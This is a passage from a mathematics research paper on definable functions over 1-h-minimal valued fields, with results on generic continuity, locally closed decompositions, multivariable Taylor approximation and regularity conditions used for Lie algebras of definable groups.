\(p(y)\in U_{2}\) in \(X/G\) such that \(p^{-1}(U_{i})\subset V_{i}\). We conclude that \(U_{1}\) and \(U_{2}\) are disjoint. **Proposition 2.14**.: _Let \(K\) be a 1-h-minimal valued field. Suppose \(U\subset K^{n}\) is open and \(f:U\to(K^{r})^{[s]}\) is definable. Then there is an open dense definable set \(U^{\prime}\subset U\) such that \(f\) is continuous in \(U^{\prime}\)._ Proof.: This statement is equivalent to saying that the interior of the set of points on which \(f\) is continuous is dense. As this property is expressible by a first order formula we may assume \(\mathrm{acl}=\mathrm{dcl}\), see Fact 2.5 and the remark following it. In that case we have a definable section \(s:(K^{r})^{[s]}\to K^{rs}\), and if \(V\subseteq U\) is open dense such that \(sf\) is continuous, as provided by Proposition 2.12, then \(f\) is continuous in \(V\). **Proposition 2.15**.: _Suppose \(X\subset K^{n}\) is \(b\)-definable. Then there is finite partition of \(X\) into \(b\)-definable sets, such that for each element \(Y\) of the partition there is a coordinate projection \(\pi:Y\to U\) onto an open set \(U\subset K^{m}\), such that the fibers of \(\pi\) all have the same cardinality equal to \(s\), and the associated map \(f:U\to(K^{n-m})^{[s]}\) is continuous._ **Remark 2.16**.: As in Remark 2.10, we need to allow the two cases \(m=0\) and \(m=n\). The set \(K^{0}\) consists of a single point, and has a unique topology. Proof.: This is a consequence of dimension theory and the previous observation. In more detail, we proceed by induction on the dimension of \(X\). First, recall that \(X\) has a finite partition into \(b\)-definable sets such that for each set \(X^{\prime}\) in the partition there is a coordinate projection \(\pi:X^{\prime}\to K^{r}\) with finite fibers and \(r=\dim(X^{\prime})\), see Fact 2.9. So now assume \(\pi:X\to K^{r}\) is a coordinate projection with finite fibers and \(r=\dim(X)\), and denote \(\pi^{\prime}:X\to K^{n-r}\) the projection into the other coordinates. There is an integer \(s\) which bounds the cardinality of the fibers of \(\pi\). If we denote \(Y_{k}\) the set of elements \(a\in K^{r}\) such that \(X_{a}=\pi^{\prime}(\pi^{-1}(a))\) has cardinality \(k\) then we get \(Y_{0}\cup\dots\cup Y_{s}=K^{r}\). Now let \(V_{j}\subset Y_{j}\) be open dense in the interior of \(Y_{j}\) and such that the map \(V_{j}\to(K^{n-r})^{[j]}\) given by \(a\mapsto X_{a}\) is continuous, see Proposition 2.14. Then the set \(\{x\in X:\pi(x)\in Y_{j}\setminus V_{j},1\leq j\leq s\}\) is of lower dimension than \(X\), by item 2 of Proposition 2.11, and so we may apply the induction hypothesis on it. Recall that a subset \(Y\subset X\) of a topological space \(X\) is locally closed if it is the intersection of an open set and a closed set. This is equivalent to \(Y\) being relatively open in its closure. It is also equivalent to, for every point \(y\in Y\), the existence of a neighborhood \(V\) of \(y\), such that \(Y\cap V\) is relatively closed in \(V\). **Proposition 2.17**.: _Suppose \(K\) is 1-h-minimal and \(X\subset K^{n}\) an \(a\)-definable set. Then \(X\) is a finite union of \(a\)-definable locally closed subsets of \(K^{n}\)._ Proof.: This is a consequence of Proposition 2.15. Namely, there is a partition of \(X\) into a finite union of definable subsets for each of which there is a coordinate projection with finite fibers onto an open set \(U\), so we may assume \(X\) is of this form. We may further assume that the fibers have constant cardinality \(k\) and the associated mapping \(U\to(K^{r})^{[k]}\) is continuous. Then \(X\) is closed in \(U\times K^{r}\) and so locally closed. We finish by reviewing a more difficult property of dimension. We will only use this in Proposition 5.20, Proposition 6.9 and Corollary 6.14, which are not used in the main theorems. **Proposition 2.18**.: _Suppose \(K\) is a 1-h-minimal field and \(X\subset K^{n}\). Then \(\dim(\operatorname{cl}(X)\setminus X)<\dim(X)\)._ This is item 6 of [4, Proposition 5.3.4] for the residue characteristic \(0\) and it is contained in Proposition 3.1.1 of [5] in the mixed characteristic case. ## 3. Taylor approximations In this section we show that, in the \(1\)-h-minimal setting, the generic one variable Taylor approximation theorem ([5, Theorem 3.1.2]) implies a multi-variable version of the theorem. In equicharacteristic \((0,0)\)) this is [4, Theorem 5.6.1]. Though the proof in mixed characteristic is, essentially, similar; we give the details, for the sake of completeness and in view of the importance of this result in the sequel. We then proceed to introducing some regularity conditions for definable functions (implied, in the present context, by Taylor's approximation theorem) necessary for computations related to the Lie algebra of definable groups. First, we recall the multi-index notation. If \(i=(i_{1},\ldots,i_{n})\in\mathbb{N}^{n}\), we denote \(|i|=i_{1}+\cdots+i_{n}\) and \(i!=i_{1}!\cdots i_{n}!\). For \(x=(x_{1},\cdots,x_{n})\in K^{n}\) we denote \(x^{i}=x_{1}^{i_{1}}\cdots x_{n}^{i_{n}}\). Also if \(f:U\to K\) is a function defined in an open set of \(K^{n}\), we denote \(f^{(i)}(x)=(\frac{\partial^{i_{1}}}{\partial x_{1}^{i_{1}}}\cdots\frac{ \partial^{i_{n}}}{\partial x_{n}^{i_{n}}}f)(x)\) whenever it exists. Note that we are not assuming equality of mixed derivatives, but see Corollary 3.6. **Proposition 3.1**.: _Let \(K\) be a 1-h-minimal field of residue characteristic \(0\). Suppose \(f:U\to K\) is an \(a\)-definable function with \(U\subset K^{n}\) open and let \(r\in\mathbb{N}\). Then there is an \(a\)-definable set \(C\), of dimension strictly smaller than \(n\), such that for any open ball, \(B\subseteq U\) disjoint from \(C\) the derivative \(f^{(i)}\) exists in \(B\) for every \(i\) with \(|i|\leq r\), and has constant valuation in \(B\). Moreover,_ \[\left|f(x)-\sum_{\{i:|i|<r\}}\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right| \leq\max_{\{i:|i|=r\}}\left|\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right|\] _For every \(x,x_{0}\in B\)._ This is [4, Theorem 5.6.1]. Our first order of business is to generalize this result to positive residue characteristic. The following fact is proved by a standard compactness argument, and is often applied implicitly. We add this argument for convenience. **Fact 3.2**.: _Let \(M\) be an \(\aleph_{0}\)-saturated structure, and \(\{\Phi^{l}(\bar{D})\}_{l\in I}\) be a family of properties of definable sets \(\bar{D}=(D_{1},\ldots,D_{n})\) in \(M\), indexed by a directed set \(I\). Let \(b\) be a tuple in \(M\), and \(S\) be a \(b\)-definable set. Assume that_ 1. _For all_ \(l\) _the property_ \(\Phi^{l}\) _is definable in definable families. I.e, if_ \(\{D_{i,a}\}_{a\in T}\) _are_ \(b\)_-definable families, then the set_ \(\{a\in T:\Phi^{l}(\bar{D}_{a})\text{ holds}\}\) _is_ \(b\)_-definable._ 2. \(\Phi^{l}\) _implies_ \(\Phi^{l^{\prime}}\) _for all_ \(l\leq l^{\prime}\)_._ 3. _For every_ \(a\in S\)_, there are_ \(ba\)_-definable sets_ \(D_{i,a}\)_, satisfying_ \(\Phi^{l_{a}}\) _for some_ \(l_{a}\in I\)_._ _Then there are \(\{D_{i,a}\}_{a\in S}\)\(b\)-definable families of sets, and a fixed \(l\in I\), such that \(\Phi^{l}(\bar{D}_{a})\) holds for every \(a\in S\)._ **Remark 3.3**.: Formally, \(\Phi^{l}\) is a subset of \[\{(D_{1},\ldots,D_{n}):D_{i}\text{ is a definable set and}\}\] and we say \(\Phi^{l}(D_{1},\ldots,D_{n})\) holds if the tuple \((D_{1},\cdots,D_{n})\) belongs to \(\Phi^{l}\). Note also that the tuple \((D_{1},\ldots,D_{n})\) can be replaced with \(D_{1}\times\cdots\times D_{n}\), so there is no loss of generality in taking \(\Phi^{l}\) of the form \(\Phi^{l}(D)\). Proof.: Let \(a\in S\). By hypothesis there are \(b\)-definable families \(\{D^{a}_{i,a^{\prime}}\}_{a^{\prime}\in S^{0,a}_{i}}\) and an element \(l^{a}\in I\), such that \((D^{a}_{1,a},\ldots,D^{a}_{n,a})\) satisfies \(\Phi^{l^{a}}\). Consider \(S^{a}\) to be the set of \(a^{\prime}\in S\) such that \(a^{\prime}\in S^{0,a}_{i}\) for \(i=1,\ldots,n\), and such that \(\Phi^{l^{a}}(\bar{D}^{a}_{a^{\prime}})\) holds. By hypothesis, this is a \(b\)-definable set contained in \(S\) and containing \(a\). We conclude that \(S=\bigcup_{a\in S}S^{a}\) is a cover of \(S\) by \(b\)-definable sets, and so by compactness and saturation there is a finite sub-cover, say \(S=S^{1}\cup\cdots\cup S^{k}\) for \(S^{r}=S^{a_{r}}\). Indeed, if there was no finite sub-cover, then the partial type expressing \(x\in S\) and \(x\notin S^{a}\) for all \(a\in S\), is a consistent \(b\)-type, and so a realization in \(M\) would contradict \(S=\bigcup_{a\in S}S^{a}\). Then \(D_{i,a}\) defined as \(D^{a_{r}}_{i,a}\) if \(a\in S^{r}\setminus\bigcup_{r^{\prime}<r}S^{r^{\prime}}\) satisfy that \(\{D_{i,a}\}_{a\in S}\) form \(b\)-definable families. If we take \(l\) such that \(l\geq l^{a_{1}},\ldots,l^{a_{k}}\), then we get that \(\Phi^{l}(\bar{D}_{a})\) holds for every \(a\in S\), as required. **Notation 3.4**.: If \(D\subset E\times F\), and \(a\in E\) we often denote \(D_{a}=\{b\in F:(a,b)\in D\}\). If \(b\in F\) we denote, when no ambiguity can occur, \(D_{b}=\{a\in E:(a,b)\in D\}\). If \(f:D\to C\) is a function, we let \(f_{a}:D_{a}\to C\) denote the function \(f_{a}(b)=f(a,b)\), and similarly \(f_{b}\) for \(b\in F\). **Proposition 3.5**.: _Let \(K\) be a 1-h-minimal field of positive residue characteristic, \(f:U\to K\) an \(a\)-definable function with \(U\subset K^{n}\) open, and let \(r\in\mathbb{N}\). Then there is an integer \(m\), and a set \(C\), closed, \(a\)-definable with \(\dim(C)<n\), such that for every open ball, \(B\subseteq U\)\(m\)-next to \(C\), \(f^{(i)}\) exists in \(B\) for every \(i\) with \(|i|\leq r\), and \(f^{(i)}\) has constant valuation in \(B\). Moreover,_ \[\left|f(x)-\sum_{\{i:|i|<r\}}\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right|\leq \max_{\{i:|i|=r\}}\left|\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right|\] _For every \(x,x_{0}\in B\)._ Proof.: We proceed by induction on \(n\), the case \(n=1\) being [5, Theorem 3.1.2]. Assume the result for \(n\) and let \(f:U\to K\) be an \(a\)-definable function with \(U\subset K^{n}\times K\) open, \(i\) a multi-index with \(|i|\leq r\). Then for every \(x\in K^{n}\) there is a finite \(ax\)-definable set \(C_{x}\subset K\) and an integer \(m_{x}\) such that \[|f_{x}(y)-\sum_{s<r}\frac{1}{s!}f_{x}^{(s)}(y_{0})(y-y_{0})^{s}|\leq|\frac{1}{r!}f _{x}^{(r)}(y_{0})(y-y_{0})^{r}| \tag{1}\] for every \(y\) and \(y_{0}\) in an open ball \(m_{x}\)-next to \(C_{x}\), and such that \(|f_{x}^{(s)}(y)|\) exists and is constant in any such open ball. By a standard compactness argument (See Fact 3.2), we may assume that the \(C_{x}\) are uniformly definable and that there is some \(m\in\mathbb{N}\) such that \(m_{x}=m\) for all \(x\). Define \(C=\cup_{x}\{x\}\times C_{x}\). By induction, for each \(y\in K\) we can approximate the functions \(g_{s,y}(x)=f_{x}^{(s)}(y)\) defined on \(V_{y}=\operatorname{Int}(U_{y}\setminus C_{y})\) up to order \(r-s\). By the same compactness argument we obtain a natural number \(m^{\prime}\) and an \(a\)-definable family \(\{D_{y}\}_{y\in K^{n}}\) of subsets \(D_{y}\subseteq V_{y}\) with \(\dim(D_{y})<n\) such that \(g_{s,y}^{(i)}\) exists and has constant valuation on any ball \(m^{\prime}\)-next to \(D_{y}\) in \(V_{y}\), for every multi-index, \(i\), with \(|i|\leq r-s\). Moreover, \[|g_{s,y}(x)-\sum_{\{i:|i|<r-s\}}\frac{1}{i!}g_{s,y}^{(i)}(x_{0})(x-x_{0})^{i} |\leq\max_{\{i:|i|=r-s\}}|\frac{1}{i!}g_{s,y}^{(i)}(x_{0})(x-x_{0})^{i}| \tag{2}\] Replacing \(m\) and \(m^{\prime}\) by their maximum, we may assume \(m=m^{\prime}\). Define \(D:=\bigcup_{y}D_{y}\times\{y\}\). By additivity of dimension \(\dim(C)\leq n\) and \(\dim(D)\leq n\). Finally, take \(E=C\cup D\cup\bigcup_{y}(U_{y}\setminus V_{y})\times\{y\}\). Similar dimension considerations show that \(\dim(E)<n+1\). Note that for \((x,y)\in U\setminus E\) we have that, for \(i\) and \(s\) such that \(|i|+s\leq r\), \(f^{(i,s)}(x,y)\) and \(g_{s,y}^{(i)}(x)\) exist and are equal. Now, for \(x\in K^{n}\) define \(W_{x}=\operatorname{Int}(U_{x}\setminus E_{x})\), and for the functions \(h_{x,s,i}:y\mapsto f^{(i,s)}(x,y)\) with \(s+|i|\leq r\) defined on \(W_{x}\), we find a finite set \(F_{x}\subset W_{x}\) such that \(\{F_{x}\}_{x}\) is an \(a\)-definable family, and there is an integer \(m^{\prime}\), such that in every ball in \(W_{x}\)\(m^{\prime}\)-next to \(F_{x}\), \(h_{x,s,i}\) has constant valuation. We may assume that \(m^{\prime}=m\) as before. Let \(G\) be the closure of \(E\cup\bigcup_{x}\{x\}\times F_{x}\cup\bigcup_{x}\{x\}\times(U_{x}\setminus W_{ x})\). Note that \(\dim(G)<n+1\). Take \(B_{1}\times B_{2}\) a ball in \(U\), \(m\)-next to \(G\). Then for every \(x\in B_{1}\) we get that \(B_{2}\) is \(m\)-next to both \(C_{x}\) and \(F_{x}\) and \(B_{2}\subseteq W_{x}\). Similarly, for every \(y\in B_{2}\), \(B_{1}\subseteq V_{y}\) is \(m\)-next to \(D_{y}\). We conclude that for every \((x,y)\in B_{1}\times B_{2}\), \(f^{(i,s)}(x,y)\) exists and has constant valuation, for every index \((i,s)\) such that \(|(i,s)|\leq r\). Indeed, we have for every \((x,y),(x^{\prime},y^{\prime})\in B_{1}\times B_{2}\) that \[|f^{(i,s)}(x^{\prime},y^{\prime})|=|g_{s,y^{\prime}}^{(i)}(x^{\prime})|=|g_{s, y^{\prime}}^{(i)}(x)|=|h_{x,s,i}(y^{\prime})|=|h_{x,s,i}(y)|=|f^{(i,s)}(x,y)|,\] as the second equality follows from the condition on \(C_{x}\), and the fourth from those on \(F_{x}\) and \(W_{x}\). Now, if \((x,y)\) and \((x_{0},y_{0})\) are in \(B_{1}\times B_{2}\), then equations 1 and 2 hold and for the error term of 1 we have \(|f_{x}^{(r)}(y_{0})|=|f^{(0,r)}(x,y_{0})|=|f^{(0,r)}(x_{0},y_{0})|\). Denote \[M=\max\left\{\frac{1}{i!s!}|f^{(i,s)}(x_{0},y_{0})(x-x_{0})^{i}(y-y_{0})^{s}|: |(i,s)|=r\right\}.\] Then Equation 1 yields \(|f(x,y)-\sum_{s<r}\frac{1}{s!}f^{(0,s)}(x,y_{0})(y-y_{0})^{s}|\leq M\). Also from Equation 2 we have that \[\left|\frac{1}{s!}f^{(0,s)}(x,y_{0})(y-y_{0})^{s}-\sum_{\{i:|i|<r-s\}}\frac{1}{i! s!}f^{(i,s)}(x_{0},y_{0})(x-x_{0})^{i}(y-y_{0})^{s}\right|\leq M.\] Taking the sum over \(s\) smaller than \(r\) and using the ultrametric inequality we obtain \[\left|\sum_{s}\frac{1}{s!}f^{(0,s)}(x,y_{0})(y-y_{0})^{s}-\sum_{\{(i,s):|i|+s<r \}}\frac{1}{i!s!}f^{(i,s)}(x_{0},y_{0})(x-x_{0})^{i}(y-y_{0})^{s}\right|\leq M.\] Summing this with Equation 1 and using the ultrametric inequality once more we conclude. As a consequence of the previous theorem we obtain that partial derivatives of definable functions commute generically. **Corollary 3.6**.: _Suppose \(f:U\to K\) is a definable function for some open \(U\subset K\times K\). Then there exists a open dense \(U^{\prime}\subset U\) such that for every \((x,y)\in U^{\prime}\)_ \[\frac{\partial}{\partial x}\frac{\partial}{\partial y}f(x,y)=\frac{\partial} {\partial y}\frac{\partial}{\partial x}f(x,y)\] _and, in particular, the terms of the above equation exist in \(U^{\prime}\)._ _Moreover, if \(f:U\to K\) is such that the partial derivatives \(\frac{\partial}{\partial x}\frac{\partial}{\partial y}f(x,y)\), \(\frac{\partial}{\partial y}\frac{\partial}{\partial x}f(x,y)\) exist and are continuous in \(U\), then they are equal._ Proof.: Take a \(1\)-dimensional closed \(C\subset K\times K\) and \(m\) an integer as provided by the Taylor approximation property for errors of order \(3\). We may also assume that \(\pi(C)\) and \(m\) satisfy the same Taylor approximation property for the function \(f\pi\), where \(\pi\) is the coordinate permutation \((x,y)\mapsto(y,x)\). Then for \((x,y),(x_{0},y_{0})\in B_{1}\times B_{2}\) in a ball \(m\)-next to \(C\) we obtain (see Definition 2.1 for the big-\(O\) notation) that \[f(x,y)= f(x_{0},y_{0})+(x-x_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial x^{2}}f(x_{0},y_{0})+(y-y_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial y^{2}}f(x_{0},y_{0})+\] \[(x-x_{0})(y-y_{0})\frac{\partial}{\partial x}\frac{\partial}{ \partial y}f(x_{0},y_{0})+O((x-x_{0},y-y_{0})^{3}).\] Similarly, \[f\pi(y,x)=f(x,y)= f(x_{0},y_{0})+(x-x_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial x^{2}}f(x_{0},y_{0})+(y-y_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial y^{2}}f(x_{0},y_{0})+\] \[(x-x_{0})(y-y_{0})\frac{\partial}{\partial y}\frac{\partial}{ \partial x}f(x_{0},y_{0})+O((x-x_{0},y-y_{0})^{3})\] Taking the difference we obtain \[(x-x_{0})(y-y_{0})\frac{\partial}{\partial y}\frac{\partial}{ \partial x}f(x_{0},y_{0})-(x-x_{0})(y-y_{0})\frac{\partial}{\partial x}\frac{ \partial}{\partial y}f(x_{0},y_{0})=O((x-x_{0},y-y_{0})^{3})\] Taking \(h=(x-x_{0})=(y-y_{0})\) small we get, \(h^{2}(\frac{\partial}{\partial y}\frac{\partial}{\partial x}f(x_{0},y_{0})-\frac {\partial}{\partial x}\frac{\partial}{\partial y}f(x_{0},y_{0}))=O(h^{3})\), so \(\frac{\partial}{\partial y}\frac{\partial}{\partial x}f(x_{0},y_{0})-\frac{ \partial}{\partial x}\frac{\partial}{\partial y}f(x_{0},y_{0})=O(h)\). This is only possible when the left-hand side is \(0\), as desired. The following notation is intended to look similar to the monomial \(ax^{n}\) for \(a\in K\) and \(x\in K\), for the purpose of expressing the Taylor approximation of a multivariate function. **Definition 3.7**.: Let \(m,n\) be positive integers, and \(r\in\mathbb{N}\). Let \(J=J(r,n)=\{j\in\mathbb{N}^{n}:|j|=r\}\). Let \(a=(a_{j})_{j\in J}\) be such that \(a_{j}\in K^{m}\) for all \(j\in J\). Then, for \(x\in K^{n}\) we define \(ax^{r}=\sum\limits_{j\in J}a_{j}x^{j}\), where \(x^{j}:=\prod_{i=1}^{n}x^{j(i)}\). Note that \(x\mapsto ax^{r}\) is a function \(K^{n}\to K^{m}\). As an example, consider, in the above notation, the case \(r=1\). In this case \(J=\{e_{1},\ldots,e_{n}\}\) and for \(j\in J\) we have \(x^{j}=x_{j}\) (where \(x=(x_{1},\ldots,x_{n})\)), so for \(a=(a_{j})_{j\in J}\) with \(a_{j}\in K^{m}\) we get that \(ax=A\cdot x\) where \(A\) is the matrix whose \(j\)-th column is \(a_{j}\). **Definition 3.8**.: Let \(U\subset K^{k}\) be open, \(f:U\to K^{m}\) a function and \(a\in U\). We say that \(f\) is \(P_{n}\) at \(a\) if it is approximable by polynomials of degree \(n\) near \(a\) in the following sense: there are constants \(b_{0},\cdots,b_{n}\)\(f(a+x)=\sum_{r\leq n}b_{r}x^{r}+O(x^{n+1})\). In view of the above example, it follows immediately from the definition that a \(P_{1}\) function is differentiable and for the coefficient \(b_{1}\) in the definition we may take \(f^{\prime}(a)\) (or, more precisely \(b_{1}^{t}=f^{\prime}(a)\)). It follows from Lemma 3.10 below, that - in fact - \(b_{1}=f^{\prime}(a)^{t}\) whenever \(f\) is \(P_{n}\) for any \(n\geq 1\). **Definition 3.9**.: Let \(U\subset K^{k}\) be open, \(f:U\to K^{m}\) a function and \(a\in U\). We say \(f\) is \(T_{n}\) at \(a\) if there is \(\gamma\in\Gamma\) such that for every \(x,x^{\prime}\) with \(|x-a|,|x^{\prime}-a|<\gamma\), we have \(f(x)=\sum_{r\leq n}c_{r}(x^{\prime})(x-x^{\prime})^{r}+O(x-x^{\prime})^{n+1}\) for \(c_{r}\) a \(P_{n-r}\) function at \(a\). Note that in the previous definition, the constant implicit in the notation \(O(x-x^{\prime})^{n+1}\) (see Definition 2.1) does not depend on \(x^{\prime}\); so this definition requires some uniformity with respect to the center \(x^{\prime}\) which is not implied by simply assuming \(f\) is \(P_{n}\) at every point of a ball around \(a\). Note also that if \(f\) is \(T_{n}\) at \(c=(b,a)\) then, in particular \(f(z,a+x)=f(z)+f_{1}(z)x+\cdots+f_{n}(z)x^{n}+O(x^{n+1})\), for \(P_{n-k}\) functions \(f_{k}\) at \(b\) (and a constant in \(O(x^{n+1})\) uniform in \(z\)). This follows from the definition by taking \(x=(z,a+x)\) and \(x^{\prime}=(z,a)\). Sums and products of \(P_{n}\) (resp. \(T_{n}\)) functions are \(P_{n}\) (resp. \(T_{n}\)), and a vector function is \(P_{n}\) (resp. \(T_{n}\)) if and only if its coordinate functions are \(P_{n}\) (resp. \(T_{n}\)). We could also require the stronger condition, \(ST_{n}\), defined similarly \(T_{n}\), but requiring inductively the functions \(c_{r}\) be \(ST_{n-r}\) for \(r=1,\ldots,n\) (the base case \(ST_{0}=T_{0}\)). This definition may be more natural, and one can prove the same results for this notion in what follows, but the stated definition is enough for Lemma 3.15 which is our main motivation. **Lemma 3.10**.: _If \(f\) is \(P_{n}\) at \(a\), then for every number \(i\leq n\), the coefficients \(b_{i}\) in Definition 3.8 are determined by \(f\)._ Proof.: The problem readily reduces to the case of \(f\) a polynomial restricted to some open neighborhood, \(U\), of the origin. I.e., We have to show that if \(\sum_{i\leq n}b_{i}x^{i}=O(x^{n+1})\) in any open \(U\subseteq K^{r}\) then \(b_{i}=0\) for all \(i\). For \(x_{0}\) fixed let \(x=tx_{0}\) and consider the single variable polynomial \(P(tx_{0})=\sum_{i}\leq n(b_{i}x_{0}^{i})t^{i}=O(t^{n+1})\). If we knew the result for \(r=1\) this would give that \(b_{i}x_{0}^{i}=0\). Since \(x_{0}\in U\) was arbitrary and \(U\) contains a cartesian product of \(r\) infinite sets, this implies \(b_{i}=0\) for all \(i\). So we are reduced to proving the result for \(r=1\). In this case, if \(i\) is the smallest with \(b_{i}\neq 0\) we get \(x^{i}=O(x^{i+1})\) which is a contradiction. **Proposition 3.11**.: _If \(g\) is \(P_{n}\) at \(a\) and \(f\) is \(P_{n}\) at \(g(a)\) then the composition, \(f\circ g\) is \(P_{n}\) at \(a\)._ _If \(g\) is \(T_{n}\) at \(a\) and \(f\) is \(T_{n}\) at \(g(a)\) then \(f\circ g\) is \(T_{n}\) at \(a\)._ Proof.: For the first statement we write \[f(g(a+x))=\] \[f(g(a)+g_{1}(a)x+...+g_{n}(a)x^{n}+O(x^{n+1}))=\] \[f(g(a))+f_{1}(g(a))h(a,x)+f_{2}(g(a))h(a,x)^{2}+...+O(h(a,x)^{n+ 1})=\] \[fg(a)+b_{1}(a)x+\cdots+b_{n}(a)x^{n}+O(x^{n+1})+O(h(a,x)^{n+1}),\] where 1. \(h(a,x)=g(a,x)-g(a)=g_{1}(a)x+\cdots+g_{n}(a)x^{n}+O(x^{n+1})\) 2. The second inequality is the application of the assumption that \(f\) is \(P_{n}\) at \(g(a)\). 3. The coefficients \(b_{i}\) arise by expanding the expression \[f_{k}(a)h(a,x)^{k}=f_{k}(a)(g_{1}(a)x+\cdots+g_{n}(a)x^{n}+O(x^{n+1}))^{k}.\] To conclude, we note that, as in the proof of Lemma 3.10\(h(a,x)=O(x)\), and so \(O(h(a,x)^{n+1})=O(x^{n+1})\). The proof of the second statement is, essentially, similar: \[f(g(x))=\] \[f(g(x^{\prime})+g_{1}(x^{\prime})(x-x^{\prime})+...+g_{n}(x^{ \prime})(x-x^{\prime})^{n}+O(x-x^{\prime})^{n+1})=\] \[f(g(x^{\prime}))+f_{1}(g(x^{\prime}))h(x,x^{\prime})+f_{2}(g(x^ {\prime}))h(x,x^{\prime})^{2}+...+f_{n}(g(x^{\prime}))(x-x^{\prime})^{n}+O(h(x,x^{\prime})^{n+1})=\] \[f(g(x^{\prime}))+b_{1}(x^{\prime})(x-x^{\prime})+\cdots+b_{n}(x ^{\prime})(x-x^{\prime})^{n}+O(x^{n+1})+O(h(x,x^{\prime})^{n+1})\] Where \(h(x,x^{\prime})=g(x)-g(x^{\prime})=g_{1}(x^{\prime})(x-x^{\prime})+\cdots+g_{ n}(x^{\prime})(x-x^{\prime})^{n}+O(x-x^{\prime})^{n+1}=O(x-x^{\prime})\), and the coordinates of the coefficients \(b_{k}(x^{\prime})\) are sums and products of the coordinates of the coefficients of \(f_{i}(g(x^{\prime}))\) and \(g_{j}(x^{\prime})\) with \(i,j\leq k\). By what we have just proved, those are \(P_{n-i}\) functions. The constant appearing on \(h(x,x^{\prime})=O(x-x^{\prime})\) does not depend on \(x^{\prime}\) because the \(g_{i}\) are continuous at \(a\). We conclude that the \(b_{k}\) are \(P_{n-k}\) at \(a\), as claimed. **Proposition 3.12**.: _Let \(K\) be 1-h-minimal and \(f:U\to K^{m}\) as definable function. Then there exists \(U^{\prime}\subset U\) definable open and dense such that \(f\) is \(T_{n}\) at every point of \(U^{\prime}\)._ _In particular for every \(f:U\to K^{m}\), there is a definable open dense subset \(U^{\prime}\subset U\) such that \(f\) is strictly differentiable in \(U^{\prime}\)._ This follows from Taylor's approximation theorem (Proposition 3.1 in residue characteristic 0 and Proposition 3.5 in positive residue characteristic). The second statement follows because a \(T_{1}\) function is strictly differentiable. In the next section we show that a strictly differentiable map with invertible derivative, definable in a 1-h-minimal valued field, is a local homeomorphism. Here we show that the local inverse is strictly differentiable. We then proceed to showing that the properties \(P_{n}\) and \(T_{n}\) are also preserved in this local inverse, though this latter fact is not used for the proof of our main results. **Proposition 3.13**.: _Suppose \(f:U\to V\) is a bijection where \(U\subset K^{n}\) and \(V\subset K^{n}\) are open. Suppose \(f\) satisfies \(|f(x)-f(y)-(x-y)|<|x-y|\) for \(x,y\in U\) distinct. Assume \(f\) is differentiable at \(a\). Then \(f^{\prime}(a)\) is invertible, \(f^{-1}\) is differentiable at \(b=f(a)\) and \((f^{-1})^{\prime}(b)=f^{\prime}(f^{-1}(b))^{-1}\)._ _If \(f\) is strictly differentiable at \(a\), then \(f^{-1}\) is strictly differentiable at \(b\)._ Proof.: Note that the hypothesis implies \(|f(x)-f(x^{\prime})|=|x-x^{\prime}|\). This implies that \(f^{\prime}(a)\) is invertible. Indeed, assume otherwise, and take \(x\) close to \(a\) such that \(f^{\prime}(a)(x-a)=0\), to get \(|f(x)-f(a)|<|x-a|\), a contradiction. Assume that \(f\) is strictly differentiable at \(a\). Take \(\epsilon>0\) in \(\Gamma\). Then there is \(0<r\in\Gamma\) such that if \(|x-a|,|x^{\prime}-a|<r\), then \(|f(x)-f(x^{\prime})-f^{\prime}(a)(x-x^{\prime})|\leq\epsilon|x-x^{\prime}|\). If we denote \(y=f(x)\) and \(y^{\prime}=f(x^{\prime})\), then we have \(|y-y^{\prime}|=|x-x^{\prime}|\), so multiplying the above inequality by \(f^{\prime}(a)^{-1}\) we obtain \[|f^{-1}(y)-f^{-1}(y^{\prime})-f^{\prime}(a)^{-1}(y-y^{\prime})|=\] \[|f^{\prime}(a)^{-1}(f^{\prime}(a)(x-x^{\prime})-(f(x)-f(x^{ \prime}))|\leq\] \[|f^{\prime}(a)^{-1}||f(x)-f(x^{\prime})-f^{\prime}(a)(x-x^{\prime })|\leq\] \[\epsilon|f^{\prime}(a)^{-1}||x-x^{\prime}|=\epsilon|f^{\prime}(a) ^{-1}||y-y^{\prime}|,\] where, for a linear map, \(A\), represented by the matrix \((a_{ij})_{i,j}\) we denote \(|A|=\max_{i,j}|a_{ij}|\), and use the ultra-metric inequality to get \(|Ax|\leq|A||x|\), which we apply to obtain the first inequality in the above computation. So we conclude that \(|f^{-1}(y)-f^{-1}(y^{\prime})-f^{\prime}(a)^{-1}(y-y^{\prime})|\leq\epsilon| f^{\prime}(a)|^{-1}|y-y^{\prime}|\) for any \(y,y^{\prime}\) such that \(|y-b|=|x-a|<r\) and \(|y^{\prime}-b|=|x^{\prime}-a|<r\). We have, thus, shown that \(f^{-1}\) is strictly differentiable at \(b\) and \((f^{-1})^{\prime}(b)=f^{\prime}(f^{-1}(b))^{-1}\). To show that \(f^{-1}\) is differentiable if \(f\) is substitute \(x^{\prime}=a\) in the above argument. **Proposition 3.14**.: _Suppose \(f:U\to V\) is a bijection where \(U\subset K^{n}\) and \(V\subset K^{n}\) are open. Suppose \(f\) satisfies \(|f(x)-f(y)-(x-y)|<|x-y|\) for \(x,y\in U\) distinct. Then if \(f\) is \(P_{n}\) (resp. \(T_{n}\)) at \(b\), \(f^{-1}\) is \(P_{n}\) (resp. \(T_{n}\)) at \(f(b)\)._ Proof.: Denote \(a=f(b)\). Note that the hypothesis implies than \(|f(x)-f(y)|=|x-y|\) for all distinct \(x,y\in U\), so the inverse map \(f^{-1}\) is continuous, and in fact satisfies \(|f^{-1}(x)-f^{-1}(y)|=|x-y|\) for distinct \(x,y\in V\). In particular, \(f^{-1}\) is \(T_{0}\) in \(V\). Now, assume that \(f\) is \(P_{n}\) at \(b\), with \(n\geq 1\). In particular, by Proposition 3.13 it is differentiable and \(f^{\prime}(b)\) is invertible. Apply the fact that \(f\) is \(P_{n}\) (and see also the discussion following the definition) to get: \[f(y)-f(b)=f^{\prime}(b)(y-b)+f_{2}(b)(y-b)^{2}+\cdots+f_{n}(b)(y-b)^{n}+O(y-b) ^{n+1}.\] Rearranging, we get: 